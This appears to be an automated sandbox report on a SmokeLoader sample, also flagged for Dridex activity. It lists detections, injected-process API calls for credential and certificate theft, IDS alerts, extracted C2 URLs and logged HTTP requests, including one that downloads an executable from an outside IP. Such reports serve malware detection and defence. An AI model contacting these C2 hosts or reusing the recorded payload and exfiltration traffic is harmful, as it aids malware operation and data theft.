Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\hehcrfb

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fihcrfb	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hehcrfb	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OCYe9qcxiM.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B636F0 CryptExportKey,CryptExportKey,	9_2_00007FF780B636F0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	11_2_00C33098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	11_2_00C33717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33E04 RtlCompareMemory,CryptUnprotectData,	11_2_00C33E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	11_2_00C311E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31198 CryptBinaryToStringA,CryptBinaryToStringA,	11_2_00C31198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	11_2_00C3123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31FCE CryptUnprotectData,RtlMoveMemory,	11_2_00C31FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	14_2_00C22404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	14_2_00C2245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	14_2_00C2263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD25A4 CryptBinaryToStringA,CryptBinaryToStringA,	16_2_00AD25A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	16_2_00AD2799

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49711 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49706 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49708 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49707 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49712 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49713 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49709 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49710 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49721 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49719 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49716 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49731 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49717 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49715 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49735 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49722 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49728 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49720 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49733 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49729 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49723 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49724 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49737 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49754 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49732 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49756 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49760 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49755 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49758 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49725 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49736 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49762 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49750 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49761 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49761 -> 23.145.40.162:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 23.145.40.162 23.145.40.162

Source: Joe Sandbox View	ASN Name: INTERNETGROUP-AS-BGBulgariaBG INTERNETGROUP-AS-BGBulgariaBG
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.8:49738

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://niarejwvgfav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://lkfxgtbclffake.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://fyhvuoiqukrfjpjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jmcgnnydyiyvfde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vjdyvxrsjwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://phwhrimonssxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://hqblemeoblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ffcibdqlkyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ywfvqxxvpvjvadf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://dbbwmiqkkpy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://gklmvitduapshup.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jefnxxqxuxib.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://npjscmvmupb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ipmfrunnoji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wwkvkysjcmxmifd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhwuphumqtqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkpgpviexggpuwvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrbmtindhjismyee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynepfbdxkuieepaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkxmfugtrnxonclj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymeegmcrvikfsv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
